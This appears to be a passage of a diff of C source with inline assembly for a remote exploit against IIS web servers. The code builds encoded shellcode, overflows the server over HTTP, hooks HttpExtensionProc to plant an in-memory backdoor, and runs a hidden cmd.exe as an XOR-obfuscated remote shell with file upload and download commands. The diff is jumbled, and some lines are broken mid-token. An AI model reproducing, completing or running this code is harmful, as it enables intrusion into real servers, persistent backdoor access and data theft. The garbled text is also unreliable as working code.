shellcodefnadd+=4; - } - - for(k=0;k<=BUFFSIZE;++k){ - if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; - } - // k+=0x - memcpy(shellcodebuff,shellcodefnadd,k); //j); - cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); - for(j=0;j<0x400;++j){ - if(memcmp(str+j,"strend",6)==0) break; - } - memcpy(shellcodebuff+k,str,j); - sendpacketlong=k+j; - for(k=0;k<=0x200;++k){ - if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break; - } - for(j=0;j<sendpacketlong;++j){ - temp=shellcodebuff[j]; - // temp^=DATAXORCODE; - shellcodebuff2[i+4+k]=DATABASE+temp/0x10; - ++k; - shellcodebuff2[i+4+k]=DATABASE+temp%0x10; - ++k; - } - j=i+k; - j=j%8+3; - shellcodebuff2[i+j+k]=0; - // j=strlen(shellcodebuff2)%8+3; - for(j=0;j<=0xe000;j+=4){ - strcat(shellcodebuff2,"\x41\x41\x41\x41"); // 0x2d sub eax,num32 - // strcat(shellcodebuff2,eipexceptwin2000cn); - } - /* - strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\ - x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\ - x90"); - for(j=0;j<=0xb00;j+=4){ - strcat(shellcodebuff2,"\x90\x90\x90\x2d"); // 0x2d sub eax,num32 - } - */ - // printf("\nbuff:%s",buff); - printf("\n shellcode long 0x%x\n",sendpacketlong); - if(argc>4&&strcmp(argv[4],"apache")==0){ - strcat(buff," "); - } - else strcat(buff,buff3); - printf("\n packetlong:0x%x\n",sendpacketlong); - strcat(buff,buff4); - if(argc>6) strcat(buff,argv[6]); - else strcat(buff,server); - strcat(buff,buff5); - if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," "); - else strcat(buff,shellcodebuff2); - // strcat(buff,buff51); - if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) { - printf("\n for %s system\n",argv[4]); - strcat(buff,buff61); - } - else strcat(buff,buff6); - // printf("\n send buff:\n%s",buff); - /* - i=strlen(buff); - memset(buff+i,'a',0xc000); - memset(buff+i+0xc000-strlen(buff7),0,1); - strcat(buff+i+0xc000-0x10-strlen(buff7),buff7); - */ - // strcpy(buff8,buff7); - /* temp=buff7[5]; - temp-=offset*0x10; - buff7[5]=temp; - i=*(int *)(buff7+4)+2; - printf("\nSEH=0x%x\n",i); - */ - /* - for(i=0;i<8;++i){ - temp=buff7[i]; - printf("%2x",temp); - } - */ - /* - for(i=0;i<0xc000/0x10;++i){ - strcat(buff,buff7); - } - */ - // printf("\nbuff=%s\n",buff); - // strcat(buff,"\r\n"); - // printf("\n send buff:\n%s",buff); - // strcpy(buff+OVERADD+NOPLONG,shellcode); - sendpacketlong=strlen(buff); - // printf("buff:\n%s",buff+0x10000); - /* - #ifdef DEBUG - _asm{ - lea esp,buff - add esp,OVERADD - ret - } - #endif - */ - lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; - lockintvar2=lockintvar1; - xordatabegin=0; - for(i=0;i<1;++i){ - j=sendpacketlong; - // buff[0x2000]=0; - fprintf(stderr,"\n send packet %d bytes.",j); - // gets(buff); - send(fd,buff,j,0); - buff7[0]=MCBSIZE; - - j=MEMSIZE+0x10; - i=0; - if(argc>4&&strcmp(argv[4],"winxp")==0) - { - j=0x18; - i=8; - } - for(k=0;i<0xc000;i+=0x10){ - if(i>=j) { - - k=((i-j)/(MCBSIZE*8)); - if(k<=6){ - memcpy(buff7+0x8,buff10,8); - buff7[0x8]=buff8[k]; - buff7[0xc]=buff9[k]; - } - else memcpy(buff7,buff11,0x10); - } - memcpy(buff+i,buff7,0x10); - - } - if(argc>4&&strcmp(argv[4],"apache")==0){ - for(k=0xb000;k<=0xc000;k+=2) - { - memset(buff+k,0x0d,1); - memset(buff+k+1,0x0a,1); - } - buff[0xc000]=0; - // for(k=0;k<0x10;++k) send(fd,buff,0xc000,0); - // printf("\nbuff:%s\n",buff); - } - else send(fd,buff,0xc000,0); - - k=0; - ioctlsocket(fd, FIONBIO, &k); - j=0; - while(j==0){ - k=newrecv(fd,recvbuff,BUFFSIZE,0); - if(k>=8&&strstr(recvbuff,"XORDATA")!=0) { - xordatabegin=1; - fprintf(stderr,"\n ok!recv %d bytes\n",k); - recvbuff[k]=0; - // printf("\n recv:%s",recvbuff); - // for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int - *)(recvbuff+8+4*j)); - k=-1; - j=1; - } - if(k>0){ - recvbuff[k]=0; - fprintf(stderr,"\n recv:\n %s",recvbuff); - } - } - } - k=1; - ioctlsocket(fd, FIONBIO, &k); - // fprintf(stderr,"\n now begin: \n"); - /* - for(i=0;i<strlen(SRLF);++i){ - SRLF[i]^=DATAXORCODE; - } - send(fd,SRLF,strlen(SRLF),0); - send(fd,SRLF,strlen(SRLF),0); - send(fd,SRLF,strlen(SRLF),0); - */ - k=1; - l=0; - while(k!=0){ - if(k<0){ - l=0; - i=0; - while(i==0){ - gets(buff); - if(memcmp(buff,"iish",4)==0){ - iishelp(); - i=2; - } - if(memcmp(buff,"iisput",6)==0){ - iisput(fd,buff+6); - i=2; - } - if(memcmp(buff,"iisget",6)==0){ - iisget(fd,buff+6); - i=2; - } - if(memcmp(buff,"iiscmd",6)==0){ - iiscmd(fd,buff+6); - i=2; - } - if(memcmp(buff,"iisreset",8)==0){ - iisreset(fd,buff+6); - i=2; - } - if(memcmp(buff,"iisdie",6)==0){ - iisdie(fd,buff+6); - i=2; - } - if(i==2)i=0; - else i=1; - } - - k=strlen(buff); - - memcpy(buff+k,SRLF,3); - // send(fd,SRLF,strlen(SRLF),0); - // fprintf(stderr,"%s",buff); - /* - for(i=0;i<k+2;++i){ - lockintvar2=lockintvar2*0x100; - lockintvar2=lockintvar2%LOCKBIGNUM; - lockcharvar=lockintvar2%0x100; - buff[i]^=lockcharvar; // DATAXORCODE; - // buff[i]^=DATAXORCODE; - } - send(fd,buff,k+2,0); - */ - newsend(fd,buff,k+2,0); - // send(fd,SRLF,strlen(SRLF),0); - } - k=newrecv(fd,buff,BUFFSIZE,0); - if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) { - xordatabegin=1; - k=-1; - } - if(k>0){ - // fprintf(stderr,"recv %d bytes",k); - /* - if(xordatabegin==1){ - for(i=0;i<k;++i){ - lockintvar1=lockintvar1*0x100; - lockintvar1=lockintvar1%LOCKBIGNUM; - lockcharvar=lockintvar1%0x100; - buff[i]^=lockcharvar; // DATAXORCODE; - } - } - */ - l=0; - buff[k]=0; - fprintf(stderr,"%s",buff); - } - else{ - Sleep(20); - if(l<20) k=1; - ++l; - - } - // if(k==0) break; - } - closesocket(fd); - WSACleanup( ); - fprintf(stderr,"\n the server close connect."); - gets(buff); - return(0); - } - void shellcodefnlock() - { - _asm{ - nop - nop - nop - nop - nop - nop - nop - nop - - jmp next1 - getediadd: pop edi - mov esp,edi - and esp,0xfffff0f0 - jmp next2 - getshelladd: - push 0x01 - mov eax,edi - inc eax - inc eax - inc eax - inc eax - inc eax - mov edi,eax - mov esi,edi - // sub sp,8 - xor ecx,ecx - looplock: lodsb - cmp al,cl - jz shell - sub al,DATABASE - mov ah,al - lodsb - sub al,DATABASE - shl ah,4 - add al,ah - // lea eax,ptr word [edx*4+al] - stosb - jmp looplock - next1: call getediadd - next2: call getshelladd - shell: - NOP - NOP - NOP - NOP - NOP - NOP - NOP - NOP - - - } - } - void shellcodefn(char *ecb) - { char Buff[SHELLBUFFSIZE+2]; - int *except[3]; - FARPROC memcpyadd; - FARPROC msvcrtdlladd; - FARPROC HttpExtensionProcadd; - FARPROC Aspdlladd; - - FARPROC RtlEnterCriticalSectionadd; - FARPROC Ntdlladd; - FARPROC Sleepadd; - FARPROC GetLastErroradd; - FARPROC GetFileSizeadd; - FARPROC CreateFileAadd; - FARPROC WriteFileadd; - FARPROC ReadFileadd; - FARPROC PeekNamedPipeadd; - FARPROC CloseHandleadd; - FARPROC CreateProcessadd; - FARPROC CreatePipeadd; - FARPROC procloadlib; - FARPROC apifnadd[1]; - FARPROC procgetadd=0; - FARPROC writeclient; - FARPROC readclient; - HCONN ConnID; - FARPROC shellcodefnadd=ecb; - char *stradd,*stradd2,*dooradd; - int imgbase,fnbase,i,k,l,thedoor; - HANDLE libhandle; - int fpt; //libwsock32; - STARTUPINFO siinfo; - PROCESS_INFORMATION ProcessInformation; - HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; - int lBytesRead; - int lockintvar1,lockintvar2; - char lockcharvar; - int shelllocknum; - // unsigned char temp; - SECURITY_ATTRIBUTES sa; - - _asm { jmp nextcall - getstradd: pop stradd - lea EDI,except - mov eax,dword ptr FS:[0] - mov dword ptr [edi+0x08],eax - mov dword ptr FS:[0],EDI - } - except[0]=0xffffffff; - except[1]=stradd-0x07; - imgbase=0x77e00000; - _asm{ - call getexceptretadd - } - for(;imgbase<0xbffa0000,procgetadd==0;){ - imgbase+=0x10000; - if(imgbase==0x78000000) imgbase=0xbff00000; - if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int - *)(imgbase+0x3c))=='EP'){ - fnbase=*(int *)(imgbase+*(int - *)(imgbase+0x3c)+0x78)+imgbase; - k=*(int *)(fnbase+0xc)+imgbase; - if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ - libhandle=imgbase; - k=imgbase+*(int *)(fnbase+0x20); - for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ - if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int - *)(4+imgbase+*(int *)k)=='Acor') - { - k=*(WORD *)(l+l+imgbase+*(int - *)(fnbase+0x24)); - k+=*(int *)(fnbase+0x10)-1; - k=*(int *)(k+k+k+k+imgbase+*(int - *)(fnbase+0x1c)); - procgetadd=k+imgbase; - break; - } - } - } - } - } - //����KERNEL32��DLLģ���ַ��API���� GetProcAddress��ַ - //ע�������������ҳ�治����� - if(procgetadd==0) goto die ; - i=stradd; - for(k=1;*stradd!=0;++k) { - if(*stradd==0x9) libhandle=procloadlib(stradd+1); - else apifnadd[k]=procgetadd(libhandle,stradd); - for(;*stradd!=0;++stradd){ - } - ++stradd; - } - ++stradd; - k=0x7ffdf020; - *(int *)k=RtlEnterCriticalSectionadd; - k=stradd; - stradd=i; - thedoor=0; - i=0; - _asm{ - jmp getdoorcall - getdooradd: pop dooradd; - mov l,esp - call getexceptretadd - } - if(i==0){ - ++i; - if(*(int *)ecb==0x90){ - if(*(int *)(*(int *)(ecb+0x64))=='ok!!') { - i=0; - thedoor=1; - } - } - } - if(i!=0){ - *(int *)(dooradd-0x0c)=HttpExtensionProcadd; - *(int *)(dooradd-0x13)=shellcodefnadd; - ecb=0; - _asm{ - call getexceptretadd - } - i=ecb; - i&=0xfffff000; - ecb=i; - ecb+=0x1000; - for(;i<l;++i,++ecb) - { - if(*(int *)ecb==0x90){ - if(*(int *)(ecb+8)==(int *)ecb){ - if(*(int *)*(int *)(ecb+0x64)=='ok!!') break; - } - } - } - i=0; - _asm{ - call getexceptretadd - } - i&=0xfffff000; - i+=0x1000; - for(;i<l;++i){ - if(*(int *)i==HttpExtensionProcadd){ - *(int *)i=dooradd-7; - // break; - } - } - // *(int *)(dooradd-0x0c)=HttpExtensionProcadd; - - } - writeclient= *(int *)(ecb+0x84); - readclient = *(int *)(ecb+0x88); - ConnID = *(int *)(ecb+8) ; - stradd=k; - _asm{ - lea edi,except - mov eax,dword ptr [edi+0x08] - mov dword ptr fs:[0],eax - } - if(thedoor==0){ - _asm{ - mov eax,0xffffffff - mov dword ptr fs:[0],eax - } - } - stradd2=stradd; - stradd+=8; - k=0x20; - writeclient(ConnID,*(int *)(ecb+0x6c),&k,0); - k=8; - writeclient(ConnID,stradd+9,&k,0); - // Sleepadd(100); - - shelllocknum=LOCKBIGNUM2; - if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int - *)(ecb+0x64)+4)=='notx') shelllocknum=0; - - // iiscmd: - lockintvar1=shelllocknum%LOCKBIGNUM; - lockintvar2=lockintvar1; - iiscmd: - /* - lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; - lockintvar2=lockintvar1; - */ - sa.nLength=12; - sa.lpSecurityDescriptor=0; - sa.bInheritHandle=TRUE; - CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); - CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); - // ZeroMemory(&siinfo,sizeof(siinfo)); - _asm{ - lea EDI,siinfo - xor eax,eax - mov ecx,0x11 - repnz stosd - } - siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; - siinfo.wShowWindow = SW_HIDE; - siinfo.hStdInput = hReadPipe2; - siinfo.hStdOutput=hWritePipe1; - siinfo.hStdError =hWritePipe1; - k=0; - // while(k==0) - // { - k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo, - &ProcessInformation); - // stradd+=8; - // } - Sleepadd(200); - // PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0 - ); - - - i=0; - while(1) { - PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); - if(lBytesRead>0) { - i=0; - ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); - if(lBytesRead>0) { - for(k=0;k<lBytesRead;++k){ - lockintvar2=lockintvar2*0x100; - lockintvar2=lockintvar2%LOCKBIGNUM; - lockcharvar=lockintvar2%0x100; - Buff[k]^=lockcharvar; // DATAXORCODE; - // Buff[k]^=DATAXORCODE; - } - writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC); - // Sleepadd(20); - } - } - else{ - // Sleepadd(10); - l=0; - if(i<50){ - l=1; - ++i; - k=1; - lBytesRead=0; - } - - - - while(l==0){ - i=0; - lBytesRead=SHELLBUFFSIZE; - k=readclient(ConnID,Buff,&lBytesRead); - for(l=0;l<lBytesRead;++l){ - lockintvar1=lockintvar1*0x100; - lockintvar1=lockintvar1%LOCKBIGNUM; - lockcharvar=lockintvar1%0x100; - Buff[l]^=lockcharvar; // DATAXORCODE; - } - - if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu - ff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){ - k=8; - WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit - cmd.exe - WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit - cmd.exe - stradd2=Buff+5; - Buff[lBytesRead]=0; - goto iiscmd; - } - if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Bu - ff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){ - - - lBytesRead=0x0c; - writeclient(ConnID,stradd+0x11,&lBytesRead,0); - lockintvar1=shelllocknum%LOCKBIGNUM; - lockintvar2=lockintvar1; - lBytesRead=0; - } - if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu - ff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){ - k=8; - WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit - cmd.exe - WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit - cmd.exe - *(int *)(dooradd-0x0c)=0; - Sleepadd(0x7fffffff); - _asm{ - mov eax,0 - mov esp,0 - jmp eax - } - } - - - if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3] - ==' ') - { - l=*(int *)(Buff+4); - // - WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); - fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+ - GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 - ); - k=GetLastErroradd(); - i=0; - while(l>0){ - lBytesRead=SHELLBUFFSIZE; - k=readclient(ConnID,Buff,&lBytesRead); - if(k==1){ - if(lBytesRead>0){ - for(k=0;k<lBytesRead;++k){ - lockintvar1=lockintvar1*0x100; - lockintvar1=lockintvar1%LOCKBIGNUM; - lockcharvar=lockintvar1%0x100; - Buff[k]^=lockcharvar; // - DATAXORCODE; - } - - l-=lBytesRead; - // if(fpt>0) - - WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); - // else Sleepadd(010); - } - - // if(i>100) l=0; - } - else { - Sleepadd(0100); - ++i; - } - if(i>10000) l=0; - } - - CloseHandleadd(fpt); - l=0; - } - else{ - - if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3] - ==' '){ - - // - fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTIN - G,FILE_ATTRIBUTE_NORMAL,0); - - - fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE, - NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); - Sleepadd(100); - l=GetFileSizeadd(fpt,&k); - *(int *)Buff='ezis'; //size - *(int *)(Buff+4)=l; - lBytesRead=8; - for(i=0;i<lBytesRead;++i){ - lockintvar2=lockintvar2*0x100; - lockintvar2=lockintvar2%LOCKBIGNUM; - lockcharvar=lockintvar2%0x100; - Buff[i]^=lockcharvar; // DATAXORCODE; - } - - writeclient(ConnID,Buff,&lBytesRead,0); // - HSE_IO_SYNC); - // Sleepadd(100); - i=0; - while(l>0){ - k=SHELLBUFFSIZE; - ReadFileadd(fpt,Buff,k,&k,0); - if(k>0){ - for(i=0;i<k;++i){ - lockintvar2=lockintvar2*0x100; - lockintvar2=lockintvar2%LOCKBIGNUM - ; - lockcharvar=lockintvar2%0x100; - Buff[i]^=lockcharvar; // - DATAXORCODE; - } - - i=0; - l-=k; - writeclient(ConnID,Buff,&k,0); // - HSE_IO_SYNC); - // Sleepadd(100); - // - k=readclient(ConnID,Buff,&lBytesRead); - - } - else ++i; - if(i>100) l=0; - } - CloseHandleadd(fpt); - l=0; - } - else l=1; - } - } - if(k!=1){ - k=8; - WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe - WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe - WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe - k=GetLastErroradd(); - while(k==0x2746){ - if(thedoor==1) goto asmreturn; - Sleepadd(0x7fffffff); //���� - } - - } - else{ - - WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); - // Sleepadd(1000); - } - } - } - - die: goto die ; - _asm{ - asmreturn: - mov eax,HSE_STATUS_SUCCESS - leave - ret 04 - door: push eax - mov eax,[esp+0x08] - mov eax,[eax+0x64] - mov eax,[eax] - cmp eax,'ok!!' - jnz jmpold - pop eax - push 0x12345678 //dooradd-0x13 - ret - jmpold: pop eax - push 0x12345678 //dooradd-0xc - ret //1 - jmp door //2 - getdoorcall: call getdooradd //5 - - getexceptretadd: pop eax - push eax - mov edi,dword ptr [stradd] - mov dword ptr [edi-0x0e],eax - ret - errprogram: mov eax,dword ptr [esp+0x0c] - add eax,0xb8 - mov dword ptr [eax],0x11223344 //stradd-0xe - xor eax,eax //2 - ret //1 - execptprogram: jmp errprogram //2 bytes stradd-7 - nextcall: call getstradd //5 bytes - NOP - NOP - NOP - NOP - NOP - NOP - NOP - NOP - NOP - } - } - void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len) - { - int i,k; - unsigned char temp; - char *calladd; - for(i=0;i<len;++i){ - temp=shellbuff[i]; - if(temp==0xe8){ - k=*(int *)(shellbuff+i+1); - calladd=fnadd; - calladd+=k; - calladd+=i; - calladd+=5; - if(calladd==chkesp){ - shellbuff[i]=0x90; - shellbuff[i+1]=0x43; // inc ebx - shellbuff[i+2]=0x4b; // dec ebx - shellbuff[i+3]=0x43; - shellbuff[i+4]=0x4b; - } - } - } - } - void iisput(int fd,char *str){ - char *filename; - char *filename2; - FILE *fpt; - char buff[0x2000]; - int size=0x2000,i,j,filesize,filesizehigh; - filename="\0"; - filename2="\0"; - j=strlen(str); - for(i=0;i<j;++i,++str){ - if(*str!=' '){ - filename=str; - break; - } - } - for(;i<j;++i,++str){ - if(*str==' ') { - *str=0; - break; - } - } - ++i; - ++str; - for(;i<j;++i,++str){ - if(*str!=' '){ - filename2=str; - break; - } - } - for(;i<j;++i,++str){ - if(*str==' ') { - *str=0; - break; - } - } - if(filename=="\x0") { - printf("\n iisput filename [path\\fiename]\n"); - return; - } - if(filename2=="\x0") filename2=filename; - printf("\n begin put file:%s",filename); - j=0; - ioctlsocket(fd, FIONBIO, &j); - Sleep(1000); - fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING, - FILE_ATTRIBUTE_NORMAL,0); - filesize=GetFileSize(fpt,&filesizehigh); - strcpy(buff,"put "); - *(int *)(buff+4)=filesize; - filesize=*(int *)(buff+4); - strcpy(buff+0x8,filename2); - newsend(fd,buff,i+0x9,0); - printf("\n put file:%s to file:%s %d - bytes",filename,filename2,filesize); - Sleep(1000); - while(filesize>0){ - size=0x800; - ReadFile(fpt,buff,size,&size,NULL); - if(size>0){ - filesize-=size; - newsend(fd,buff,size,0); - // Sleep(0100); - - } - } - // size=filesize; - // ReadFile(fpt,buff,size,&size,NULL); - // if(size>0) send(fd,buff,size,0); - CloseHandle(fpt); - j=1; - ioctlsocket(fd, FIONBIO, &j); - printf("\n put file ok!\n"); - Sleep(1000); - } - void iisget(int fd,char *str){ - char *filename; - char *filename2; - FILE *fpt; - char buff[0x2000]; - int size=0x2000,i,j,filesize,filesizehigh; - filename="\0"; - filename2="\0"; - j=strlen(str); - for(i=0;i<j;++i,++str){ - if(*str!=' '){ - filename=str; - break; - } - } - for(;i<j;++i,++str){ - if(*str==' ') { - *str=0; - break; - } - } - ++i; - ++str; - for(;i<j;++i,++str){ - if(*str!=' '){ - filename2=str; - break; - } - } - for(;i<j;++i,++str){ - if(*str==' ') { - *str=0; - break; - } - } - if(filename=="\x0") { - printf("\n iisget filename [path\\fiename]\n"); - return; - } - if(filename2=="\x0") filename2=filename; - printf("\n begin get file:%s",filename); - fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHAR - E_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); - strcpy(buff,"get "); - strcpy(buff+0x4,filename2); - newsend(fd,buff,i+0x5,0); - printf("\n get file:%s from file:%s",filename,filename2); - j=0; - ioctlsocket(fd, FIONBIO, &j); - i=0; - filesize=0; - j=0; - while(j<100){ - // Sleep(100); - i=newrecv(fd,buff,0x800,0); - if(i>0){ - buff[i]=0; - if(memcmp(buff,"size",4)==0){ - filesize=*(int *)(buff+4); - j=100; - } - else { - - /* for(j=0;j<i;++j){ - lockintvar1=lockintvar1*0x100; - lockintvar1=lockintvar1%LOCKBIGNUM; - lockcharvar=lockintvar1%0x100; - buff[j]^=lockcharvar; // DATAXORCODE; - } - */ - j=0; - printf("\n recv %s",buff); - } - } - else ++j; - // if(j>1000) i=0; - } - printf("\n file %d bytes %d\n",filesize,i); - if(i>8){ - i-=8; - filesize-=i; - WriteFile(fpt,buff+8,i,&i,NULL); - - } - while(filesize>0){ - size=newrecv(fd,buff,0x800,0); - if(size>0){ - filesize-=size; - WriteFile(fpt,buff,size,&size,NULL); - - } - else { - if(size==0) { - printf("\n ftp close \n "); - } - else { - printf("\n Sleep(100)"); - Sleep(100); - } - } - } - CloseHandle(fpt); - printf("\n get file ok!\n"); - j=1; - ioctlsocket(fd, FIONBIO, &j); - } - void iisreset(int fd,char *str){ - char buff[0x2000]; - int i,j; - printf("\nreset xor data.\n"); - Sleep(1000); - j=0; - ioctlsocket(fd, FIONBIO, &j); - strcpy(buff,"reset"); - newsend(fd,buff,strlen(buff),0); - Sleep(1000); - - lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; - lockintvar2=lockintvar1; - while(1){ - j=recv(fd,buff,0x2000,0); - if(j>0){ - buff[j]=0; - for(i=0;i<j;++i){ - if(buff[i]==0) buff[i]='b'; - } - // printf("\nrecv 0x%x bytes:%s",j,buff); - if(strstr(buff,"xordatareset")!=0){ - printf("\nxor data reset ok.\n"); - for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){ - lockintvar1=lockintvar1*0x100; - lockintvar1=lockintvar1%LOCKBIGNUM; - lockcharvar=lockintvar1%0x100; - buff[i]^=lockcharvar; // DATAXORCODE; - } - +/* + if(argc>4){ + offset=atoi(argv[4]); + } +// OVERADD+=offset; +// packlong=0x10000-offset+0x8; + if(offset<-0x20||offset>0x20){ + fprintf(stderr,"\n offset error !offset -32 --- +32 ."); + gets(buff); + exit(1); + } +*/ + if(argc <2){ + // WSACleanup( ); +// exit(1); + } + else server = argv[1]; + for(i=0;i<strlen(server);++i){ + if(server[i]!=' ') + break; + } + if(i<strlen(server)) server+=i; + for(i=0;i+3<strlen(server);++i){ + + if(server[i]==':'){ + if(server[i+1]=='\\'||server[i+1]=='/'){ + if(server[i+2]=='\\'||server[i+2]=='/'){ + server+=i; + server+=3; break; } } - // else if(j==0) break; - // strcpy(buff,"\r\nmkdir d:\\test6\r\n"); - // newsend(fd,buff,strlen(buff),0); - } - Sleep(1000); - j=1; - ioctlsocket(fd, FIONBIO, &j); - // printf("aaa"); + } + } + for(i=1;i<=strlen(server);++i){ + if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0; + } + d_ip = inet_addr(server); + if(d_ip==-1){ + he = gethostbyname(server); + if(!he) + { + WSACleanup( ); + printf("\n Can't get the ip of %s !\n",server); + gets(buff); + exit(1); + } + else memcpy(&d_ip, he->h_addr, 4); + } + + if(argc>3) port=atoi(argv[3]); + else port=WEBPORT; + if(port==0) port=WEBPORT; + fd = socket(AF_INET, SOCK_STREAM,0); + i=8000; + setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); + + s_in3.sin_family = AF_INET; + s_in3.sin_port = htons(port); + s_in3.sin_addr.s_addr = d_ip; + printf("\n nuke ip: %s port +%d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); + +if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct +sockaddr_in))!=0) +{ + closesocket(fd); + WSACleanup( ); + fprintf(stderr,"\n connect err."); + gets(buff); + exit(1); +} + + _asm{ + mov ESI,ESP + cmp ESI,ESP + } + _chkesp(); + chkespadd=_chkesp; + temp=*chkespadd; + if(temp==0xe9) { + ++chkespadd; + i=*(int*)chkespadd; + chkespadd+=i; + chkespadd+=4; + } + /* + shellcodefnadd=shellcodefnlock; + temp=*shellcodefnadd; + if(temp==0xe9) { + ++shellcodefnadd; + k=*(int *)shellcodefnadd; + shellcodefnadd+=k; + shellcodefnadd+=4; + } + for(k=0;k<=0x500;++k){ + if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; + } +*/ + memset(buff,NOPCODE,BUFFSIZE); + /* + strcpy(buff,buff0); + if(argc>6) strcat(buff,argv[6]); + else strcat(buff,server); + strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n"); + + strcat(buff,buff1); +*/ + strcpy(buff,buff1); + strheadlong=strlen(buff); + OVERADD+=strheadlong-1; + +if(argc>2) buff2add=argv[2]; +for(;;++buff2add){ + temp=*buff2add; + if(temp!='\\'&&temp!='/') break; +} +// printf("\nfile:%s",buff2add); +buff2long=strlen(buff2add); +strcat(buff,buff2add); +// fprintf(stderr,"\n offset:%d\n",offset); +// offset+=strheadlong-strlen(buff1); + +/* +for(i=0x404;i<=0x500;i+=8){ + memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 + memcpy(buff+offset+i+4,eipexceptwin2000add,4); + } +if(argc>5){ + if(strcmp(argv[5],"sp2")==0) { + memcpy(buff+offset+i,"\x58",1); } - void iisdie(int fd,char *str){ - char buff[0x200]; - int j; - printf("\niis die.\n"); - j=0; - ioctlsocket(fd, FIONBIO, &j); - Sleep(1000); - strcpy(buff,"iisrr "); - newsend(fd,buff,strlen(buff),0); - Sleep(1000); - j=1; - ioctlsocket(fd, FIONBIO, &j); - lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; - lockintvar2=lockintvar1; - } - void iiscmd(int fd,char *str){ - char *cmd="\0"; - char buff[2000]; - int i,j; - j=strlen(str); - for(i=0;i<j;++i,++str){ - if(*str!=' '){ - cmd=str; - break; +} +for(i=0x220;i<=0x380;i+=8){ + memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 + memcpy(buff+offset+i+4,eipexceptwinnt,4); + } +for(i=0x580;i<=0x728;i+=8){ + memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 + memcpy(buff+offset+i+4,eipexceptwinnt,4); + } +*/ +// winnt 0x2cc or 0x71c win2000 0x130 or 0x468 +// memcpy(buff+offset+i+8,exceptret,strlen(exceptret)); +shellcodefnadd=shellcodefnlock; + temp=*shellcodefnadd; + if(temp==0xe9) { + ++shellcodefnadd; + k=*(int *)shellcodefnadd; + shellcodefnadd+=k; + shellcodefnadd+=4; + } +for(k=0;k<=0x500;++k){ + if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; + } + memset(shellcodebuff2,NOPCODE,BUFFSIZE); + i=0x1000; + memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100); + + 